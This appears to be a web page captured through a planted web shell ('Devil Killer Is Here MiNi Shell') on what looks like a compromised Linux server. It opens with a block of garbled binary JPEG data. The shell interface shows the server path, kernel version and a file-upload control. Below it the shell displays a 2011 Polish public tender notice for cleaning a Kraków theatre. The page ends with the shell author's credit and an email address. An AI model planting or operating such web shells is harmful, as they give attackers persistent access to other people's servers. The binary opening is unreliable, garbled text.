JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/329967-N-2011.html

<p class="kh_header"><b>Kraków: Sprzątanie pomieszczeń Krakowskiego Teatru SCENA STU w           Krakowie   al. Krasińskiego 16-18</b><br>
<b>Numer ogłoszenia: 329967 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krakowski Teatr Scena STU , Al. Krasińskiego 16-18, 30-101 Kraków, woj. małopolskie, tel. 012 4222263, faks 012 4222263.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.scenastu.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń Krakowskiego Teatru SCENA STU w           Krakowie   al. Krasińskiego 16-18.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje sprzątanie pomieszczeń Krakowskiego Teatru SCENA STU w Krakowie   z podziałem na trzy strefy: 
	strefa codziennego serwisu 8 godzinnego ,  
	strefa serwisu nadliczbowego wynikającego z potrzeb repertuarowych Teatru (spektakle i próby )
	strefa 4 godzinnego serwisu na zasadach hotelowych  w godzinach 10-14 z podziałem: 
1. Poniedziałek - Piątek 10-14 
2. oraz strefa  serwisu 2 godzinnego na zasadach hotelowych  w godzinach 12-14 w soboty , niedziele i święta

ZAKRES USŁUG
1.	Sprzątanie   powierzchni biurowych:
PODZIAŁ SPRZĄTANIA:
-	codzienne (biura ; sanitariat , kuchenka, korytarz  II p.)
-	okresowe  (mycie okien raz na kwartał, szorowanie korytarza raz na kwartał)

2.Sprzątanie powierzchni sceny  foyer oraz zaplecza sceny i garderób
PODZIAŁ SPRZĄTANIA:
-codzienne (scena, foyer teatru wraz z szatnią, ubikacje publiczności ,  garderoby, zaplecze sceny w tym korytarz i ubikacja do działu elektryczno -akustycznego)
-okresowe : (akrylizacja-nabłyszczenie chemiczne raz w mc-u) foyer, mycie okien w garderobach, mycie fliz w ubikacjach,klatka schodowa budynku nr 16,powierzchnia chodnika przed budynkiem nr16)
-Utrzymanie w czystości pomieszczeń zaplecza kuchennego pod barkiem teatru w zależności od potrzeb oraz w szczególności po wszelkich cateringach jednak nie częściej niż 2 razy w miesiącu.

  3.Sprzątanie pomieszczeń mieszkań służbowych -Pokoje Gościnne
codzienne : sprzątanie poszczególnych pokoi (wymiana pościeli) wraz z łazienkami (mycie i dezynfekcja wszystkich pomieszczeń sanitarnych  wraz z urządzeniami po każdej zrealizowanej rezerwacji środkiem odkażającym) Oraz w  zależności  od wskazań osoby zarządzającej pokojami służbowymi, mycie korytarza, wraz z kuchenką oraz klatką schodową od I piętra do  strychu.
-okresowe : mycie lodówki , mycie kuchenki mikrofalowej , akrylizacja korytarza, mycie okien.

A.  ZAKRES I CZĘSTOTLIWOŚĆ PRAC
dotyczy utrzymywania czystości w pomieszczeniach 
Krakowskiego Teatru Scena STU w Krakowie

W zależności od potrzeb repertuarowych

	Scena, foyer teatru, ubikacje publiczności ,  garderoby, zaplecze sceny, oraz chodnik przed bud. Teatru  w zależności od potrzeb repertuarowych teatru jak i imprez okolicznościowych . Pracownik powinien zgłaszać się do pracy na rejonie co najmniej na 1h wcześniej przed rozpoczęciem się danego spektaklu , próby czy imprezy. Oraz obsługa spektaklu do czasu zakończenia się ostatniej przerwy w spektaklu.



CODZIENNIE
	mycie i dezynfekcja wszystkich pomieszczeń wraz z urządzeniami
	mycie urządzeń sanitarnych (umywalki, zlewy, WC, ewentualne mycie fliz w tych pomieszczeniach itp. 
	Odkurzanie (oczyszczanie plam z  wykładzin) mycie podłóg /powierzchnie zmywalne/;
	opróżnianie pojemników na śmieci:
-	usuwanie worków z odpadami;
-	oczyszczenie pojemników wewnątrz i zewnątrz;
-	włożenie nowych worków.
	oczyszczenie powierzchni biurek, stołów, szaf, szafek, kaloryferów, parapetów itp.(zmywanie 
             na mokro i wytarcie do sucha)
	oczyszczanie powierzchni krzeseł (części twarde - jw.)
	oczyszczanie z kurzu ram obrazów, tablic, lamp na biurkach, kinkietów, aparatów
telefonicznych  i  sprzętu komputerowego;
	zmycie na mokro i wytarcie do sucha drzwi, klamek, futryn, poręczy;
	mycie luster, powierzchni szklanych;
	      w trakcie trwania dyżurów utrzymywanie czystości na bieżąco  / WC, łazienki, foyer, 
           korytarze/; 
	      sprzątanie klatki schodowej / wejście nr 16/ od poziomu I pietra do wejścia na strych
	     uzupełnienie  mydła w płynie w dozownikach na mydło (dostawa zamawiającego) , 
     uzupełnienie  papieru toaletowego w pojemnikach według potrzeb (dostawa zamawiającego)
	sprzątanie wejścia głównego do teatru, wraz z utrzymaniem czystości gablot znajdujących się
przy  wejściu głównym
	klatka schodowa do wysokości II piętra
	klatka schodowa do magazynu w piwnicach pod oficyną 18
	sprzątanie obszaru chodnika przed budynkiem w zakresie nr 16  al. Krasińskiego

TYGODNIOWO
	czyszczenie i polerowanie wszelkich wymagających tego części mebli i wyposażenia;
	mycie gablot reklamowych przed drzwiami wejściowymi do budynku

MIESIĘCZNIE
	gruntowne oczyszczanie mebli tapicerowanych odkurzaczem;
	gruntowe mycie podłóg /powierzchnie zmywalne/ wraz z nabłyszczeniem  foyer teatru w 
           okresie trwania sezonu teatralnego (od 01 września do 01 lipca każdego roku)
	mycie ścian  zmywalnych  do 1,70 m;
	mycie gablot reklamowych przed wejściem do budynku ( duże witryny reklamowe)
	odkurzanie i mycie powierzchni podłóg powierzchnia magazynowa(poddasze oraz zewnętrzny
           magazyn strojów)

KWARTALNIE
	mycie lamp sufitowych;
	generalne mycie i odkurzanie ścian powyżej 1,70 m;
	Mycie wszystkich okien w pomieszczeniach teatru wraz z ramami.

B. MATERIAŁY DOSTARCZANE PRZEZ WYKONAWCĘ
	worki małe i duże: 	na odpady sanitarne ( czarne) 
				papierowe 
	środki do mycia i dezynfekcji oraz odkamieniania
	środki myjąco - dezynfekujące do sanitariatów
	pozostałe środki myjąco - czyszczące 
	środki natłuszczające do podłóg
	piasek, sól.
	Maszyny i urządzenia



C. MATERIAŁY DOSTARCZANE PRZEZ ZAMAWIAJĄCEGO

	mydło w płynie
	papier toaletowy
	ręczniki papierowe


ROZBICIE  Metrażowe
	Pomieszczenia Biurowe -611 m2
	Scena ,foyer, garderoby, wc.  528,5 m2
	Klatka schodowa, chodnik przed budynkiem nr 16,48 m2
	Brama nr 16 i klatka schodowa do wysokości II pietra30,25 m2
	Klatka schodowa od II pietra do strychu 42 m2
	Pokoje gościnne  IIIp. wraz z łazienkami 263 m2
	Powierzchnia magazynowa  -  135m2-strych
	Sala prób patio -71m2
	Pomieszczenia pod barkiem teatru 58 m2
	Zejściowa klatka schodowa do magazynu dekoracji- 6,5 m2
	Magazyn strojów teatralnych - 8,5 m2

RAZEM                      1.770,23 m2

Powierzchnie szklane
Powierzchnia okien - 330 m2
Powierzchnia luster i szyb - 30,5 m2
Gabloty zewnętrzne - 14,09 m2
RAZEM                      374,59 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.90.00.00-6, 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie trzech lat przed dniem wszczęcia postępowania wykonali co najmniej 3 zamówienia, których przedmiotem były usługi porządkowe w obiektach kultury o podobnym zakresie oraz  o wartości minimum 100000zł każda.  - na podstawie wykazu usług</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują niezbędnym sprzętem do wykonania zamówienia ( odkurzacze: przemysłowy, wodny, piorący, szorowarka mechaniczna, polerka mechaniczna) - na podstawie wykazu narzędzi i urządzeń technicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują  osobami  posiadającymi  co najmniej roczne doświadczenie w sprzątaniu obiektów o podobnym charakterze - na podstawie wykazu osób</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>są ubezpieczeni od odpowiedzialności cywilnej  w zakresie prowadzonej działalności na kwotę co najmniej 100000zł  - polisa lub inny dokument</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.scenastu.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kraków al. Krasińskiego 16-18 p.1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2012 godzina 09:00, miejsce: Kraków al. Krasińskiego 16-18 p.4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com